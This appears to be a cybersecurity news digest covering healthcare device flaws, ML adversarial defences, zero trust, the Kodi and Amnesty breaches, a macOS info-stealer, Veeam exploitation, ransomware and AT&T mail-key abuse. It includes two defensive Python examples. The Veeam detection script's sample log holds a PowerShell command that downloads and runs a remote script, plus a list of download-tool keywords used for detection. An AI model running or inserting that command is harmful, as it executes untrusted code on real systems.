Healthcare Institutions at Risk Due to Reliance on Technology

As the healthcare system has become more technology-driven, there has been a significant increase in the use of cloud-based and internet applications for delivering services. Unfortunately, this has also brought an increase in cybersecurity risks, including breaches, scams, and ransomware attacks, which have left the healthcare system highly vulnerable.
The healthcare industry faces a variety of cybersecurity challenges, ranging from malware that can compromise patient privacy to distributed denial of service (DDoS) attacks that can disrupt patient care. The unique nature of the healthcare industry makes it particularly vulnerable to cyber-attacks, because attacks can have consequences beyond financial loss and privacy breaches.

For example, ransomware is a type of malware that can be especially damaging to hospitals because it can result in the loss of patient data, which can put lives at risk. It is therefore essential for healthcare organizations to be vigilant and take the necessary steps to protect their systems from cyber threats, so that patients' confidential data and lives are not put at risk.

Against this backdrop, last month the Food and Drug Administration (FDA) published detailed guidance addressing growing cybersecurity concerns, specifically for medical devices.

The guidance requires manufacturers to submit a plan for addressing cybersecurity vulnerabilities and to design processes that ensure cybersecurity.

1. Manufacturers must submit a plan for monitoring and addressing cybersecurity vulnerabilities within a reasonable time frame after market release. The plan should include procedures for coordinated vulnerability disclosure.

2. Manufacturers must design and maintain processes to ensure that the device and related systems are cyber-secure.

These guidelines are particularly important for devices that use wireless communications, as they are more exposed to cyber-attacks. The FDA said that by following these guidelines, manufacturers can help ensure the safety and security of patients who use their medical devices.

A recent joint report by Censinet, KLAS, and the American Hospital Association (AHA) disclosed that most healthcare organizations are reactive rather than proactive in identifying cybersecurity threats. 

The report found that organizations have low coverage in supply chain, asset, and risk management, with over 40% not compliant with response and recovery planning involving suppliers and third-party providers. These reports are a high alert for the healthcare industry, since cyber threats advance every day, becoming more sophisticated and harder to tackle.

Defending Against Adversarial Attacks in Machine Learning: Techniques and Strategies

As machine learning algorithms become increasingly prevalent in our daily lives, the need for secure and reliable models is more important than ever. 

However, even the most sophisticated models are not immune to attacks, and one of the most significant threats to machine learning algorithms is the adversarial attack.

In this post, we will explore what adversarial attacks are, how they work, and what techniques are available to defend against them.

What are Adversarial Attacks?

In simple terms, an adversarial attack is a deliberate attempt to fool a machine learning algorithm into producing incorrect output. 

The attack works by introducing small, carefully crafted changes to the input data that are imperceptible to the human eye, but which cause the algorithm to produce incorrect results. 

Adversarial attacks are a growing concern in machine learning, as they can be used to compromise the accuracy and reliability of models, with potentially serious consequences.

How do Adversarial Attacks Work?

Adversarial attacks work by exploiting the weaknesses of machine learning algorithms. These algorithms are designed to find patterns in data and use them to make predictions. 

However, they are often vulnerable to subtle changes in the input data, which can cause the algorithm to produce incorrect outputs. 

Adversarial attacks take advantage of these vulnerabilities by adding small amounts of noise or distortion to the input data, which can cause the algorithm to make incorrect predictions.

Understanding White-Box, Black-Box, and Grey-Box Attacks

1. White-Box Attacks

White-box attacks occur when the attacker has complete knowledge of the machine-learning model being targeted, including its architecture, parameters, and training data. Attackers can use various methods to generate adversarial examples that can fool the model into producing incorrect predictions.

Because white-box attacks require a high level of knowledge about the targeted machine-learning model, they are often considered the most dangerous type of attack. 

2. Black-Box Attacks

In contrast to white-box attacks, black-box attacks occur when the attacker has little or no information about the targeted machine-learning model's internal workings. 

These attacks can be more time-consuming and resource-intensive than white-box attacks, but they can also be more effective against models that have not been designed to withstand adversarial attacks.

3. Grey-Box Attacks

Grey-box attacks are a combination of both white-box and black-box attacks. In a grey-box attack, the attacker has some knowledge about the targeted machine-learning model, but not complete knowledge. 

These attacks can be more challenging to defend against than white-box attacks but may be easier to defend against than black-box attacks. 

There are several types of adversarial attacks, including:

Adversarial examples 

These are inputs that have been specifically designed to fool a machine-learning algorithm. They are created by making small changes to the input data, which are not noticeable to humans but which cause the algorithm to make a mistake.

Adversarial perturbations    

These are small changes to the input data that are designed to cause the algorithm to produce incorrect results. The perturbations can be added to the data at any point in the machine learning pipeline, from data collection to model training.

Model inversion attacks

These attacks attempt to reverse-engineer the parameters of a machine-learning model by observing its outputs. The attacker can then use this information to reconstruct the original training data or extract sensitive information from the model.

How can We Fight Adversarial Attacks?

As adversarial attacks become more sophisticated, it is essential to develop robust defenses against them. Here are some techniques that can be used to fight adversarial attacks:

Adversarial training 

This involves training the machine learning algorithm on adversarial examples as well as normal data. By exposing the model to adversarial examples during training, it becomes more resilient to attacks in the future.

Defensive distillation 

This technique involves training a model to produce outputs that are difficult to reverse-engineer, making it more difficult for attackers to extract sensitive information from the model.

Feature squeezing 

This involves reducing the number of features in the input data, making it more difficult for attackers to introduce perturbations that will cause the algorithm to produce incorrect outputs.

Adversarial detection 

This involves adding a detection mechanism to the machine learning pipeline that can detect when an input has been subject to an adversarial attack. Once detected, the input can be discarded or handled differently to prevent the attack from causing harm.
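As an added illustration (not code from the original post), the feature-squeezing and adversarial-detection items above combined into one detector: the input is squeezed (1-bit depth reduction and a 3-wide median filter, the squeezers used in Xu et al.'s feature-squeezing paper), the model is queried on the original and on each squeezed copy, and a large gap between the resulting probability vectors flags the input. The classifier, the clean sample and the hand-made perturbed sample are constructed toys; the perturbation is placed by hand, not produced by any attack algorithm.

```python
"""Feature-squeezing detector: compare a model's output on an input and on squeezed copies."""
import math
from typing import Callable, Dict, List, Sequence

Vector = List[float]


def sigmoid(z: float) -> float:
    return 1.0 / (1.0 + math.exp(-z))


class ToyClassifier:
    """Constructed stand-in for a real model: one linear unit over 8 'pixels' in [0, 1]."""

    def __init__(self, weights: Sequence[float], bias: float = 0.0) -> None:
        self.w = list(weights)
        self.b = bias

    def predict_proba(self, x: Sequence[float]) -> float:
        """Probability of class 1."""
        return sigmoid(sum(w * v for w, v in zip(self.w, x)) + self.b)


def bit_depth_squeeze(x: Sequence[float], bits: int) -> Vector:
    """Reduce colour depth: every value snaps to one of 2**bits levels."""
    levels = 2 ** bits - 1
    return [round(v * levels) / levels for v in x]


def median_smooth(x: Sequence[float], window: int = 3) -> Vector:
    """1-D median filter with edge replication (a real image would use a 2-D window)."""
    half, n = window // 2, len(x)
    out: Vector = []
    for i in range(n):
        neigh = sorted(x[min(max(j, 0), n - 1)] for j in range(i - half, i + half + 1))
        out.append(neigh[len(neigh) // 2])
    return out


SQUEEZERS: Dict[str, Callable[[Sequence[float]], Vector]] = {
    "bit_depth_1": lambda x: bit_depth_squeeze(x, 1),
    "median_3": lambda x: median_smooth(x, 3),
}


def squeeze_scores(model: ToyClassifier, x: Sequence[float]) -> Dict[str, float]:
    """L1 distance between the [p, 1-p] vector for x and the one for each squeezed copy."""
    p = model.predict_proba(x)
    return {name: 2.0 * abs(p - model.predict_proba(sq(x))) for name, sq in SQUEEZERS.items()}


def is_adversarial(model: ToyClassifier, x: Sequence[float], threshold: float = 0.1) -> bool:
    """Flag the input if any squeezer moves the prediction by more than the threshold."""
    return max(squeeze_scores(model, x).values()) > threshold


# Constructed model: the first four pixels vote for class 1, the last four against it.
MODEL = ToyClassifier([2, 2, 2, 2, -2, -2, -2, -2])
CLEAN = [0.9, 0.9, 0.9, 0.9, 0.1, 0.1, 0.1, 0.1]
# Hand-made perturbation for illustration (not produced by an attack algorithm):
# isolated pixel spikes flip the prediction but do not survive squeezing.
PERTURBED = [0.9, 0.0, 0.9, 0.0, 0.1, 1.0, 0.1, 1.0]

if __name__ == "__main__":
    for name, x in (("clean", CLEAN), ("perturbed", PERTURBED)):
        print(name, round(MODEL.predict_proba(x), 3),
              {k: round(v, 3) for k, v in squeeze_scores(MODEL, x).items()},
              "flagged" if is_adversarial(MODEL, x) else "accepted")
```

The threshold is a tuning knob: in practice it is chosen from the squeeze scores of known-clean validation data so that the false-positive rate stays acceptable.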

As the field of machine learning continues to evolve, it is crucial that we remain vigilant and proactive in developing new techniques to fight adversarial attacks and maintain the integrity of our models.

Utilising Multiple Solutions Makes Your Zero Trust Strategy More Complex

According to BeyondTrust, business operational models are much more complicated now than they were a few years ago. 

Integration with zero trust

More applications, information stored and moving through the cloud, remote personnel accessing critical systems and data, and other factors are all contributing to this complexity. 

Threat to supply chain security 

As a result of a company's growing reliance on its supply chain, partners, suppliers, and shippers are now frequently directly linked to its systems. This has increased the demand for identity solutions and a zero trust strategy. 

The survey's results suggest that integration requirements could delay timely implementation. The research centred on understanding adoption rates, incidents, solutions, obstacles, and emerging areas of focus for identity and zero trust.

“Today’s business operating models are highly complex, with remote employees accessing critical systems using dozens, and even hundreds of applications,” stated Morey Haber, Chief Security Officer at BeyondTrust. 

“Data is transmitted between clouds and corporate data centers, with third-party contractors and supply chain partners, suppliers, and shippers directly connecting to these corporate systems. Legacy security architectures and network defenses are less effective at managing this extended perimeter. Zero trust principles and architectures are being adopted by public and private sectors because they have become one of the most effective approaches to mitigating the heightened risks to highly sensitive identities, assets, and resources,” concluded Haber. 

Data breaches and identity theft skyrocket 

The study found that 81% of respondents had experienced two or more identity-related incidents in the previous 18 months, virtually all of the sample. A sizable portion of these incidents involved privileged accounts.

A zero-trust strategy is still being implemented by more than 70% of businesses in order to secure an expanding security perimeter brought on by increased cloud usage and remote workers. 

For their zero trust strategy, almost all businesses said they were utilising multiple vendors and solutions, with the majority citing four or more. 70% of the businesses interviewed rely on expensive third-party services, frequently specialised coding, for integration. Deployment was further complicated by the fact that 84% of those had zero trust defenses requiring several integration strategies.

Native integration is needed for zero trust solutions 

Over 70% of respondents to a survey stated that they had to remove a security solution because it didn't integrate well, demonstrating how critical integration has become for many businesses. According to those questioned, flaws in their zero trust strategy led to a variety of problems, including a slower rate of issue resolution, poorer user experiences, erroneous access privileges, human intervention, and compliance problems. 

A faster reaction to security risks and enhanced compliance are two benefits of better integration that save time in addition to resources, according to more than 90% of businesses.

Important issues affecting businesses

Identity-related

  • 93% report having had identity problems as a result of integration concerns in the past 18 months
  • 81% have reported two or more identity incidents
  • 63% of respondents say that identity issues directly involved privileged users and credentials, while 5% are unsure.

Zero trust related

  • 76% of businesses are still working to establish a zero-trust strategy to protect their environment
  • 96% of businesses employ several zero-trust strategies, with 56% utilising four or more. 

Integration-related

  • 70% of businesses are forced to rely on vendor bespoke code for the integration of zero trust solutions
  • 84% of businesses use a variety of integration techniques to implement their zero-trust strategy
  • 99% of businesses say zero trust solutions must be integrated with a wide range of other programmes.
  • Easy integration is rated as "very important" or "important" by 94% of participants, with none saying it isn't.

To lessen the burden of integration processes, practically every organisation said that a zero trust approach requires integration with multiple other business and collaboration apps. Most have made native integration a crucial consideration for choosing zero-trust solutions due to integration problems.

Forum Database Sold Online After Kodi Data Breach

Hackers have breached the Kodi Foundation's MyBB forum database, stealing user information such as email addresses and private messages, which were then put up for sale online.

Kodi itself is an open-source, cross-platform media player, organizer, and streaming suite that supports third-party add-ons, allowing users to access and stream content from a variety of sources and customize their experience to their personal preferences.

Several months ago, the Kodi Foundation published a statement revealing that it had been breached by hackers. This was after the organization's MyBB forum database, containing user information and private messages, was stolen and sold online. 

The threat actors abused the account to create database backups, which they downloaded and then deleted. In addition to those, the database's existing nightly full backups were also downloaded. A request to disable the account in question has since been sent.

The non-profit organization developed Kodi media center, a free and open-source software entertainment hub, and media player. According to a breach notice published on April 8, the Kodi Team learned of unauthorized access after a data dump of its forum user base (MyBB) was offered for sale online. 

The now-defunct Kodi forum had about 401,000 users who posted 3 million messages covering various topics, including video streaming, suggestions, support, sharing upcoming add-ons, and more. Hackers took over the forum database by accessing the admin interface with inactive staff credentials, according to a site statement on Saturday. 

In the aftermath of the breach, the developer has shut the forum down. The forum, which was home to over 3 million posts, is preparing a global password reset, as it is assumed that “all passwords are compromised” despite being stored in an encrypted format.

In an update published earlier today, Kodi's administrators informed the community that they are commissioning a new forum server; the existing systems do not otherwise appear to have been compromised.

The forum will be redeployed on the latest MyBB version. This involves a heavy workload to incorporate custom functional changes and backport security fixes, so a delay of "several days" is to be expected.

Kodi has shared the list of exposed email addresses associated with forum accounts with the Have I Been Pwned data breach notification service.

Even though the passwords were hashed and salted, Kodi warns that all of them should be treated as compromised for the time being. Service availability may be affected when the admin team carries out the global password reset.

According to Kodi's release, any sensitive information transmitted between users through the user-to-user messaging system may have been compromised. If you reused the same login and password on another website, you should follow that website's instructions for resetting or changing your password.

On February 15th, 2023, a seller known as Amius claimed to have sold the database dump on the Breached forum under that handle. According to the listing, the dump contains 400,314 Kodi forum members, including "several IPTV resellers."

There is no information regarding the database price, as the seller accepted a private offer over Telegram. The Breached forum is one of the largest hacking and data leak forums; over the past few years it has developed a reputation for hosting, leaking, and selling breaches of companies, governments, and various other organizations.

The Threat of Deepfakes: Hacking Humans

Deepfake technology has been around for a few years, but its potential to harm individuals and organizations is becoming increasingly clear. In particular, deepfakes are becoming an increasingly popular tool for hackers and fraudsters looking to manipulate people into giving up sensitive information or making financial transactions.

One recent example of this was the creation of a deepfake video featuring a senior executive from the cryptocurrency exchange Binance. The video was created by fraudsters with the intention of tricking developers into believing they were speaking with the executive and providing them with access to sensitive information. This kind of CEO fraud can be highly effective, as it takes advantage of the trust that people naturally place in authority figures.

While deepfake technology can be used for more benign purposes, such as creating entertaining videos or improving visual effects in movies, its potential for malicious use is undeniable. This is especially true when it comes to social engineering attacks, where hackers use psychological tactics to convince people to take actions that are not in their best interest.

To prevent deepfakes from being used to "hack the humans", it is important to take a multi-layered approach to security. This includes training employees to be aware of the risks of deepfakes and how to identify them, implementing technical controls to detect and block deepfake attacks, and using threat intelligence to stay ahead of new and emerging threats.

At the same time, it is important to recognize that deepfakes are only one of many tools that hackers and fraudsters can use to target individuals and organizations. To stay protected, it is essential to maintain a strong overall security posture, including regular software updates, strong passwords, and access controls.

The most effective defense against deepfakes and other social engineering attacks is to maintain a healthy dose of skepticism and critical thinking. By being aware of the risks and taking steps to protect yourself and your organization, you can help ensure that deepfakes don't "hack the humans" and cause lasting harm.

Illumina: FDA, CISA Warn Against Security Flaw Making Medical Devices Vulnerable to Remote Hacking

The US government has issued a warning to healthcare providers and lab employees about a critical flaw, discovered in the genomics giant Illumina’s medical devices, that could be used by threat actors to alter or steal sensitive patient medical data.

On Thursday, US cybersecurity agency CISA and the US Food and Drug Administration (FDA) released separate advisories to alert organizations of the vulnerabilities affecting the Universal Copy Service (UCS) component used by a number of Illumina's genetic sequencing devices.

The flaw, tracked as CVE-2023-1968, enables remote access to a vulnerable device over the internet without a password. If exploited, it could allow attackers to compromise devices and cause them to generate false, altered, or missing results.

The advisories also cover a second vulnerability, CVE-2023-1966, rated 7.4 out of 10 for severity. This flaw could give attackers access at the operating-system level, where they could upload and run malicious programs to change settings and access private information on the affected product.

The FDA claimed it was unaware of any actual attacks that exploited the flaws, but it did issue a warning that a hacker might use them to remotely control a device or change its settings, software, or data, as well as remotely access the user's network.

“On April 5, 2023, Illumina sent notifications to affected customers instructing them to check their instruments and medical devices for signs of potential exploitation of the vulnerability,” states the FDA in its notification. 

The products from Illumina that are vulnerable include iScan, iSeq, MiniSeq, MiSeq, MiSeqDx, NextSeq, and NovaSeq. These products, which are used all around the world in the healthcare industry, are made for clinical diagnostic use when sequencing a person's DNA for different genetic diseases or research needs.

According to Illumina spokesperson David McAlpine, Illumina has “not received any reports indicating that a vulnerability has been exploited, nor do we have any evidence of any vulnerabilities being exploited.” He declined to comment on whether the company has technical resources that could detect exploitation, and did not specify the number of devices affected by the vulnerability.

Illumina CTO Alex Aravanis in a LinkedIn post mentions that the company detected the flaw as part of routine efforts to examine its software for potential flaws and exposures.

“Upon identifying this vulnerability, our team worked diligently to develop mitigations to protect our instruments and customers[…]We then contacted and worked in close partnership with regulators and customers to address the issue with a simple software update at no cost, requiring little to no downtime for most,” Aravanis said.  

This New macOS Info-stealer in Town is Targeting Crypto Wallets

A new info-stealer malware has been identified, designed to steal a wide range of personal data, including local files, cookies, financial information, and passwords stored in macOS browsers. It is called Atomic macOS Stealer (aka AMOS, or simply Atomic), and its developer is constantly adding new capabilities to it.

The most recent update was issued on April 25. According to the Cyble research team, Atomic is sold on a private Telegram channel for a $1,000 monthly fee. Customers receive a DMG installer file, a cryptocurrency checker, a MetaMask brute-forcing tool, and a web panel for managing attack campaigns.

The malicious DMG file is designed to avoid detection and was flagged as malicious by only one of 59 AV engines on VirusTotal. When the victim runs the DMG file, it displays a password prompt disguised as a macOS system notice, encouraging the user to enter the system password.

After obtaining the system password, it attempts to steal passwords stored in Keychain, macOS's default password manager. This includes WiFi passwords, credit card information, site logins, and other critical information. Atomic is built with a variety of data-theft features, allowing its operators to target various browsers and crypto wallets, among other things.

It enumerates the applications installed on the system in order to steal information from them. Cryptocurrency wallets (Binance, Electrum, Atomic, and Exodus) and web browsers (Google Chrome, Microsoft Edge, Firefox, Opera, Yandex, and Vivaldi) are among the programs targeted.

It also targets over 50 cryptocurrency wallet extensions, such as Coinbase, Yoroi, BinanceChain, Jaxx Liberty, and Guarda. Furthermore, it attempts to steal system information such as the Model name, RAM size, number of cores, serial number, UUID number, and others.

Atomic is another example of the growing number of cyber threats facing macOS. Researchers have already discovered two new threats, the RustBucket malware and a new LockBit variant, indicating growing interest in Apple's desktop operating system, which powers Mac computers.

As a result, it is past time for Mac users to recognise the growing threat and enhance their security posture.

Targeted: Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics


Cyberattacks on vulnerable Veeam backup servers exposed online

Veeam Backup and Replication software is a popular choice for many organizations to protect their critical data. However, recent reports have revealed that hackers are targeting vulnerable Veeam backup servers that are exposed online, leaving organizations at risk of data theft and other cyberattacks. 

There is evidence that at least one group of threat actors, associated with several high-profile ransomware gangs, is targeting Veeam backup servers.

Starting from March 28th, incidents have been reported in which malicious activity and tools resembling FIN7 attacks were used to exploit a high-severity vulnerability in the Veeam Backup and Replication (VBR) software.

This vulnerability, tracked as CVE-2023-27532, exposes encrypted credentials stored in the VBR configuration to unauthenticated users, potentially allowing unauthorized access to the backup infrastructure hosts.

The vendor addressed the vulnerability on March 7 and provided instructions for workarounds. On March 23, however, pentesting company Horizon3 released an exploit for CVE-2023-27532, showing how the credentials could be extracted in plain text via an unsecured API endpoint.

The exploit also allowed attackers to run code remotely with the highest privileges. Despite the fix, Huntress Labs reported that roughly 7,500 internet-exposed VBR hosts were still susceptible to the vulnerability.

Evidence of FIN7 tactics used in recent attacks

A recent report by cybersecurity and privacy company WithSecure reveals that attacks in late March targeted servers running Veeam Backup and Replication software that was publicly accessible. The techniques used in these attacks were similar to those previously associated with FIN7. 

The researchers concluded that the attacker exploited CVE-2023-27532, given the timing of the campaign, the presence of an open TCP port 9401 on the compromised servers, and the vulnerable VBR version running on the affected hosts.

During a threat hunt exercise using telemetry data from WithSecure's Endpoint Detection and Response (EDR), the researchers discovered Veeam servers generating suspicious alerts such as sqlservr.exe spawning cmd.exe and downloading PowerShell scripts.
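The EDR signal described above (sqlservr.exe spawning cmd.exe, and PowerShell pulling scripts down) expressed as a small hunt over process-creation records. This is an added example, not WithSecure's or Veeam's code; the record format, host names, file paths and the TEST-NET address in the sample lines are all constructed.

```python
"""Hunt for the Veeam-server pattern above: SQL Server spawning a shell that fetches code."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


@dataclass
class ProcessEvent:
    ts: str
    host: str
    parent_image: str
    image: str
    command_line: str


# Child processes a database engine has no business launching on a backup server.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Substrings typical of a script being pulled from the network (matched lower-case).
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "net.webclient", "bitsadmin", "certutil", "curl ", "wget ")


def image_name(path: str) -> str:
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    """Parse one record of the constructed 'ts|host|parent|image|cmdline' format."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return ProcessEvent(ts, host, parent, image, cmdline)


def assess(ev: ProcessEvent) -> Optional[Dict[str, str]]:
    """Return a finding if sqlservr.exe spawned a shell; rate it higher if it downloads."""
    if image_name(ev.parent_image) != "sqlservr.exe":
        return None
    if image_name(ev.image) not in SHELLS:
        return None
    cmd = ev.command_line.lower()
    downloads = any(marker in cmd for marker in DOWNLOAD_MARKERS)
    return {
        "ts": ev.ts,
        "host": ev.host,
        "rule": "sqlservr_shell_download" if downloads else "sqlservr_spawns_shell",
        "severity": "high" if downloads else "medium",
        "command_line": ev.command_line,
    }


def hunt(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Run assess() over every non-empty record and collect the findings in order."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        if not line.strip():
            continue
        finding = assess(parse_event(line))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry: one benign user shell, two shells born from sqlservr.exe,
# and the SQL service itself being started by services.exe (placeholder paths).
SAMPLE_LOG = (
    "2023-03-28T02:14:07Z|VBR-01|C:\\Windows\\explorer.exe"
    "|C:\\Windows\\System32\\cmd.exe|cmd.exe /c dir\n"
    "2023-03-28T02:15:31Z|VBR-01|C:\\SQL\\MSSQL\\Binn\\sqlservr.exe"
    "|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami\n"
    "2023-03-28T02:15:40Z|VBR-01|C:\\SQL\\MSSQL\\Binn\\sqlservr.exe"
    "|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://198.51.100.7/s.ps1')\"\n"
    "2023-03-28T02:16:02Z|VBR-02|C:\\Windows\\System32\\services.exe"
    "|C:\\SQL\\MSSQL\\Binn\\sqlservr.exe|sqlservr.exe\n"
)

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG.splitlines()):
        print(f"{f['severity']:6} {f['host']} {f['ts']} {f['rule']}: {f['command_line']}")
```

Any hit from the medium rule on a VBR host is worth a look even without a download marker, since the page's own indicator is the parent-child relationship rather than the exact command line.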

These servers are exposed in the first place because some organizations use insecure configurations when setting up their Veeam backup servers, making them reachable over the internet. Attackers can then exploit such weaknesses to gain access to sensitive data and files.

One of the most common attack methods is through brute-force attacks. In this method, hackers use automated tools to try different username and password combinations until they gain access to the Veeam backup server. They can also use other methods like social engineering or spear-phishing to get hold of credentials or trick users into installing malware on their systems.

Once the hackers have gained access, they can steal the backup files, modify or delete them, or use them to launch further attacks on the organization's systems. The impact of such attacks can be severe, causing loss of critical data, disruption to business operations, and significant financial losses.

Mitigating the risk of cyberattacks on Veeam backup servers

To prevent such attacks, organizations need to ensure that their Veeam backup servers are properly secured. This includes configuring the server to only allow access from trusted networks, implementing strong password policies, and keeping the software up-to-date with the latest security patches.

Additionally, organizations should consider implementing multi-factor authentication (MFA) to provide an extra layer of security. MFA requires users to provide more than one form of identification, such as a password and a one-time code sent to their mobile device, making it more difficult for hackers to gain access even if they have obtained login credentials.

Regular security audits and vulnerability assessments can also help identify potential weaknesses and enable organizations to take proactive measures to mitigate them before hackers can exploit them.

Veeam backup servers are a critical component of an organization's data protection strategy, and securing them should be a top priority. Organizations must take necessary steps to ensure that their Veeam backup servers are properly secured and not exposed to the internet. 

By taking these necessary steps, organizations can significantly reduce the risk of a security breach and protect their critical data from falling into the wrong hands. It is always better to be proactive and take preventive measures rather than deal with the aftermath of a cyberattack.

The Persistent Threat of Ransomware: RSA Conference 2023 Highlights

The cybersecurity industry's highest-profile annual gathering, the RSA Conference, has focused heavily on the ongoing and increasing threat of ransomware. Last year, 68% of all cyberattacks involved ransomware, according to cybersecurity firm Sophos. 

The National Security Agency's director of cybersecurity, Rob Joyce, recently confirmed that Russian hackers are now weaponizing ransomware to target Ukrainian logistics companies and organizations in Western-allied countries.

Ransomware typically begins with file-encrypting malware being installed on an organization's network, which is then followed by a ransom note displayed on every screen. Hackers demand payment, often in cryptocurrency, to unlock the networks and prevent any data leaks. In recent years, ransomware has affected schools, hospitals, small businesses, and more.

At RSA, conversations have shifted from viewing ransomware as a mere annoyance to a persistent and dangerous threat. A panel on the last day of the conference acted out a hypothetical response to an Iran-backed ransomware attack on US banks in 2025, highlighting the severity of the threat.

The shift in perspective is in response to the increasing sophistication and persistence of ransomware attacks, as well as the fact that cybercriminals have been successful in monetizing their activities. The use of cryptocurrency for payment also makes it more difficult for law enforcement to trace the source of the attacks.

Ransomware attacks are now considered to be a "forever problem," meaning they will be a persistent threat for the foreseeable future. Organizations and individuals must take proactive steps to prevent attacks, including maintaining strong security measures and regularly backing up data. It is also crucial to be vigilant for any suspicious activity and to report any potential attacks immediately to the appropriate authorities.

In conclusion, ransomware attacks continue to be a major concern for cybersecurity professionals, and their impact will only continue to grow. Organizations and individuals must be proactive in their cybersecurity measures to prevent attacks and minimize damage.

Hackers are Breaking Into AT&T to Steal Cryptocurrency

In recent news, individuals with AT&T email addresses are being targeted by unknown hackers who are using their access to break into victims' cryptocurrency exchange accounts and steal their digital assets. Cryptocurrency exchanges are online platforms that allow users to buy, sell, and trade digital currencies like Bitcoin and Ethereum. 

To use a cryptocurrency exchange, users need to create an account and provide personal information for identity verification. They can then deposit traditional currencies and use them to purchase digital currencies. 

According to an anonymous source, cybercriminals have discovered a way to gain unauthorized access to the email accounts of AT&T users, including those with email domains such as att.net, sbcglobal.net, and bellsouth.net. 

These hackers exploit a section of AT&T's internal network to create mail keys for any user. Mail keys are unique credentials that allow AT&T email users to access their accounts via email applications like Thunderbird or Outlook without using their passwords.

Once the hackers obtain a target's mail key, they use an email app to access the victim's account and reset passwords for more valuable services like cryptocurrency exchanges. This leaves the victim vulnerable, as the hackers can easily reset passwords for Coinbase or Gemini accounts via email, transferring the victim's digital assets to their own accounts and leaving the victim with nothing. 

One of the victims reported that “it is very frustrating because it is obvious that the ‘hackers’ have direct access to the database or files containing these customer Outlook keys, and the hackers don’t need to know the user’s AT&T website login to access and change these Outlook login keys”.

AT&T spokesperson Jim Kimberly acknowledged the unauthorized creation of secure mail keys that allow access to email accounts without passwords. The company has since updated its security controls and proactively required a password reset on some email accounts. 

“We identified the unauthorized creation of secure mail keys, which can be used in some cases to access an email account without needing a password. We have updated our security controls to prevent this activity. As a precaution, we also proactively required a password reset on some email accounts,” he added. 

However, Kimberly further said that the hackers had no access to the company's internal systems. “There was no intrusion into any system for this exploit. The bad actors used an API access.”

Amnesty International Takes a While to Disclose the Data Breach From December

Amnesty International Australia notified supporters via email last Friday that their data might be at risk owing to "anomalous activity" discovered in its IT infrastructure. 

The email was not only sent late on a Friday, but also long after the activity was discovered. The email, which Gizmodo Australia has seen, states that the activity was discovered towards the end of last year.

“As soon as we became aware of this activity on 3 December 2022, we engaged leading external cyber security and forensic IT advisors to determine if any unauthorised access to our IT environment had occurred,” Amnesty International Australia stated.

“We acted quickly to ensure the AIA IT environment was secure and contained, put additional security measures in place and commenced an extensive investigation.” 

Amnesty International said that while it took the organisation some time to notify its supporters of a security breach, the investigation is now complete and has revealed that an unauthorised third party temporarily gained access to its IT system.

“In the course of this investigation, we identified that some low-risk information relating to individuals who made donations in 2019 was accessed, but of low risk of misuse,” the organisation added. 

Although "low risk" information was not defined, it is clear from the security advice that it offered that the data is most likely name, email address, and phone number. Despite being satisfied that the information obtained through the breach won't be used inappropriately, Amnesty International Australia advised its supporters to "carefully scrutinise all emails," "don't answer calls from unknown or private numbers," and "never click on links in SMS messages or social media messages you are not expecting to receive." 

The breach only affected the local arm of the charity, according to Amnesty International Australia, and did not affect any other branches. The statement further said that although the scope of the "information accessed in the cyber event" did not meet the requirements or threshold for notification under the Notifiable Data Breaches Scheme, Amnesty International Australia had decided to notify its supporters "in the interest of transparency".